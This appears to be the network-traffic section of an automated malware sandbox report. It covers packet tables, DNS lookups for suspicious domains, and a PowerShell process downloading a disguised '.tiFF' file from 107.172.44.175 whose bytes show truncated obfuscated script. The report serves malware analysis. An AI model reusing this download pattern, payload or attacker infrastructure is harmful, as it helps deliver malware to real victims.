                                                                                                      Dec 4, 2024 13:08:46.653316021 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.653537035 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.653585911 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.655776978 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.656039000 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.656121969 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.658180952 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.658373117 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.658430099 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.660722971 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.660909891 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.660973072 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.663176060 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.663324118 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.663374901 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.665553093 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.665719032 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.665770054 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.737396955 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.737582922 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.737695932 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.737926006 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.738154888 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.738235950 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.739700079 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.739929914 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.740009069 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.741503954 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.741916895 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.741997004 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.743254900 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.743494987 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.743597031 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.744986057 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.745197058 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.745268106 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.746732950 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.746972084 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.747047901 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.748465061 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.748821974 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.748897076 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.750233889 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.750437975 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.750514030 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.751899004 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.752084017 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.752156019 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.753664970 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.753777027 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.753850937 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.755383015 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.755580902 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.755650997 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.757047892 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.757249117 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.757318020 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.758589983 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.758791924 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.758867025 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.760199070 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.760462046 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.760540962 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.761868000 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.762068033 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.762144089 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.763745070 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.763880014 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.763963938 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.764935017 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.765124083 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.765202999 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.766474962 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.766653061 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.766736031 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.768066883 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.768279076 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.768367052 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.769577980 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.769777060 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.769892931 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.771119118 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.771332026 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.771450043 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.772834063 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.773001909 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.773082018 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.774166107 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.774348021 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.774435043 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.775722980 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.775873899 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.775963068 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.777154922 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.777359962 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.777434111 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.778598070 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.778795958 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.778877020 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.780085087 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.780286074 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.780365944 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.781584978 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.781766891 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.781861067 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.783107996 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.783343077 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.783474922 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.784509897 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.784733057 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.784807920 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.785950899 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.786134958 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.786212921 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.787379026 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.787587881 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.787683010 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.788223982 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.788430929 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.788496971 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.789113998 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.789494038 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.789572954 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.790047884 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.790232897 CET8049709107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:46.790319920 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:46.841506004 CET4970980192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:09:36.509560108 CET4972380192.168.2.8172.67.150.211
                                                                                                      Dec 4, 2024 13:09:36.629599094 CET8049723172.67.150.211192.168.2.8
                                                                                                      Dec 4, 2024 13:09:36.632131100 CET4972380192.168.2.8172.67.150.211
                                                                                                      Dec 4, 2024 13:09:36.642601967 CET4972380192.168.2.8172.67.150.211
                                                                                                      Dec 4, 2024 13:09:36.762377024 CET8049723172.67.150.211192.168.2.8
                                                                                                      Dec 4, 2024 13:09:38.120176077 CET8049723172.67.150.211192.168.2.8
                                                                                                      Dec 4, 2024 13:09:38.120537043 CET8049723172.67.150.211192.168.2.8
                                                                                                      Dec 4, 2024 13:09:38.120623112 CET4972380192.168.2.8172.67.150.211
                                                                                                      Dec 4, 2024 13:09:38.124145985 CET4972380192.168.2.8172.67.150.211
                                                                                                      Dec 4, 2024 13:09:38.246624947 CET8049723172.67.150.211192.168.2.8
                                                                                                      Dec 4, 2024 13:09:53.516742945 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:53.636560917 CET8049764172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:53.638226032 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:53.653451920 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:53.773359060 CET8049764172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:54.892039061 CET8049764172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:54.892244101 CET8049764172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:54.892304897 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:54.892584085 CET8049764172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:54.892636061 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:55.168530941 CET4976480192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:56.180886030 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:56.304106951 CET8049771172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:56.304245949 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:56.318219900 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:56.438435078 CET8049771172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:57.553250074 CET8049771172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:57.553406000 CET8049771172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:57.553459883 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:57.553678989 CET8049771172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:57.553754091 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:57.833908081 CET4977180192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:58.879699945 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:58.999479055 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:58.999568939 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:59.019768000 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:09:59.139805079 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:09:59.139820099 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:00.253221989 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:00.253374100 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:00.253407001 CET8049777172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:00.253463984 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:00.253499985 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:00.521450043 CET4977780192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:01.551536083 CET4978380192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:01.674875021 CET8049783172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:01.675019026 CET4978380192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:01.782880068 CET4978380192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:01.902803898 CET8049783172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:02.988033056 CET8049783172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:02.988607883 CET8049783172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:02.988867044 CET4978380192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:02.991456032 CET4978380192.168.2.8172.67.128.109
                                                                                                      Dec 4, 2024 13:10:03.111435890 CET8049783172.67.128.109192.168.2.8
                                                                                                      Dec 4, 2024 13:10:08.935409069 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:09.056737900 CET8049800199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:09.056833982 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:09.077312946 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:09.196984053 CET8049800199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:10.198760033 CET8049800199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:10.198893070 CET8049800199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:10.198967934 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:10.199004889 CET8049800199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:10.199064970 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:10.584072113 CET4980080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:11.603032112 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:11.722825050 CET8049810199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:11.722917080 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:11.738704920 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:11.858988047 CET8049810199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:12.872740030 CET8049810199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:12.872919083 CET8049810199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:12.872967958 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:12.873013973 CET8049810199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:12.873060942 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:13.240248919 CET4981080192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:14.259615898 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:14.379416943 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:14.379585981 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:14.394915104 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:14.515077114 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:14.515094042 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:15.528443098 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:15.528939009 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:15.528949976 CET8049816199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:15.529012918 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:15.532262087 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:15.899874926 CET4981680192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:16.915596962 CET4982280192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:17.035417080 CET8049822199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:17.035587072 CET4982280192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:17.045541048 CET4982280192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:17.165353060 CET8049822199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:18.203358889 CET8049822199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:18.203557014 CET8049822199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:18.203567982 CET8049822199.59.243.227192.168.2.8
                                                                                                      Dec 4, 2024 13:10:18.203664064 CET4982280192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:18.207442045 CET4982280192.168.2.8199.59.243.227
                                                                                                      Dec 4, 2024 13:10:18.327877998 CET8049822199.59.243.227192.168.2.8

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 4, 2024 13:08:25.206310034 CET5582553192.168.2.81.1.1.1
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET53558251.1.1.1192.168.2.8
                                                                                                      Dec 4, 2024 13:09:36.086283922 CET5188353192.168.2.81.1.1.1
                                                                                                      Dec 4, 2024 13:09:36.501069069 CET53518831.1.1.1192.168.2.8
                                                                                                      Dec 4, 2024 13:09:53.165796041 CET6031653192.168.2.81.1.1.1
                                                                                                      Dec 4, 2024 13:09:53.512207985 CET53603161.1.1.1192.168.2.8
                                                                                                      Dec 4, 2024 13:10:08.009582043 CET5545553192.168.2.81.1.1.1
                                                                                                      Dec 4, 2024 13:10:08.932662964 CET53554551.1.1.1192.168.2.8

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 4, 2024 13:08:25.206310034 CET192.168.2.81.1.1.10x8577Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:36.086283922 CET192.168.2.81.1.1.10xa9efStandard query (0)www.enoughmoney.onlineA (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:53.165796041 CET192.168.2.81.1.1.10x1937Standard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:10:08.009582043 CET192.168.2.81.1.1.10x79fbStandard query (0)www.sql.danceA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET1.1.1.1192.168.2.80x8577No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET1.1.1.1192.168.2.80x8577No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET1.1.1.1192.168.2.80x8577No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET1.1.1.1192.168.2.80x8577No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:08:25.354826927 CET1.1.1.1192.168.2.80x8577No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:36.501069069 CET1.1.1.1192.168.2.80xa9efNo error (0)www.enoughmoney.online172.67.150.211A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:36.501069069 CET1.1.1.1192.168.2.80xa9efNo error (0)www.enoughmoney.online104.21.0.98A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:53.512207985 CET1.1.1.1192.168.2.80x1937No error (0)www.cifasnc.info172.67.128.109A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:09:53.512207985 CET1.1.1.1192.168.2.80x1937No error (0)www.cifasnc.info104.21.1.251A (IP address)IN (0x0001)false
                                                                                                      Dec 4, 2024 13:10:08.932662964 CET1.1.1.1192.168.2.80x79fbNo error (0)www.sql.dance199.59.243.227A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • res.cloudinary.com
                                                                                                      • 107.172.44.175
                                                                                                      • www.enoughmoney.online
                                                                                                      • www.cifasnc.info
                                                                                                      • www.sql.dance

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.849704107.172.44.175806772C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:08:19.040237904 CET337OUTGET /244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                      Host: 107.172.44.175
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 4, 2024 13:08:20.148108006 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 04 Dec 2024 12:08:19 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Wed, 04 Dec 2024 08:28:47 GMT
                                                                                                      ETag: "259fc-6286d921a132d"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 154108
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: image/tiff
                                                                                                      Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 4c 00 4c 00 6b 00 62 00 70 00 69 00 6c 00 75 00 62 00 4c 00 76 00 66 00 41 00 62 00 4b 00 20 00 3d 00 20 00 22 00 4b 00 63 00 61 00 69 00 73 00 49 00 49 00 6f 00 41 00 50 00 4c 00 64 00 42 00 4b 00 69 00 22 00 0d 00 0a 00 4e 00 47 00 5a 00 4b 00 4a 00 4c 00 4b 00 57 00 4b 00 71 00 4e 00 74 00 69 00 55 00 47 00 20 00 3d 00 20 00 22 00 4c 00 5a 00 41 00 7a 00 52 00 62 00 41 00 5a 00 78 00 63 00 4b 00 66 00 62 00 69 00 5a 00 22 00 0d 00 0a 00 62 00 67 00 41 00 41 00 50 00 69 00 57 00 4b 00 68 00 49 00 66 00 47 00 4c 00 50 00 47 00 20 00 3d 00 20 00 22 00 74 00 70 00 6d 00 72 00 69 00 6f 00 63 00 6b 00 57 00 43 00 64 00 69 00 6c 00 55 00 49 00 22 00 0d 00 0a 00 0d 00 0a 00 57 00 6e 00 71 00 6b 00 66 00 4c 00 42 00 4c 00 69 00 41 00 73 00 6f 00 53 00 7a 00 57 00 20 00 3d 00 20 00 22 00 4e 00 6f 00 4f 00 4e 00 50 00 71 00 4b 00 4c 00 4f 00 47 00 64 00 68 00 57 00 63 00 6e 00 22 00 0d 00 0a 00 6b 00 6d 00 70 00 4c 00 52 00 69 00 6d 00 73 00 72 00 6d 00 [TRUNCATED]
                                                                                                      Data Ascii: LLkbpilubLvfAbK = "KcaisIIoAPLdBKi"NGZKJLKWKqNtiUG = "LZAzRbAZxcKfbiZ"bgAAPiWKhIfGLPG = "tpmriockWCdilUI"WnqkfLBLiAsoSzW = "NoONPqKLOGdhWcn"kmpLRimsrmKkPpZ = "QWuZmcZiqKBxcsk"oTicbLLBNiiUiAN = "fielpdkzajjiliW"LWGRNpWLcZfGKJh = "LGfTKCZvNLAebLb"rLCLqdGgLKuWKno = "sHKiCcWUcCAkWOm"mpfdcJfUjIgUWeo = "ipocUpSkeitlcWk"rKduGSqpHKLOZlU = "ILGbohGKZWLpfOi"GghmHuamHkaCGpd = "mpUhziiiZRWWpcP"NBZZKzmPiLkLdGL = "faoRiiZNWWhdGQC"CjvZLL
                                                                                                      Dec 4, 2024 13:08:20.148358107 CET224INData Raw: 00 4b 00 6e 00 66 00 50 00 66 00 74 00 6f 00 47 00 62 00 20 00 3d 00 20 00 22 00 4c 00 4e 00 4f 00 50 00 41 00 66 00 68 00 57 00 70 00 6d 00 6e 00 67 00 4b 00 68 00 68 00 22 00 0d 00 0a 00 4f 00 5a 00 68 00 66 00 53 00 66 00 65 00 78 00 72 00 43
                                                                                                      Data Ascii: KnfPftoGb = "LNOPAfhWpmngKhh"OZhfSfexrCfmieL = "ZWecWirWJUfbbml"LJxhcBLmscWkkcK = "GfkjciiosGxJrPO"LCdPZ
                                                                                                      Dec 4, 2024 13:08:20.148371935 CET1236INData Raw: 00 6b 00 65 00 66 00 74 00 43 00 4b 00 50 00 7a 00 68 00 67 00 20 00 3d 00 20 00 22 00 4c 00 41 00 54 00 41 00 4a 00 4b 00 41 00 55 00 71 00 6f 00 61 00 57 00 6f 00 6c 00 57 00 22 00 0d 00 0a 00 55 00 4c 00 4a 00 57 00 66 00 5a 00 42 00 6b 00 4e
                                                                                                      Data Ascii: keftCKPzhg = "LATAJKAUqoaWolW"ULJWfZBkNckZLKs = "szUInWsfNciZvhW"WfkRLkUhiZmfaoN = "fPLOQbWnjWLkWdG"LuhGhWnpjdKLRpn
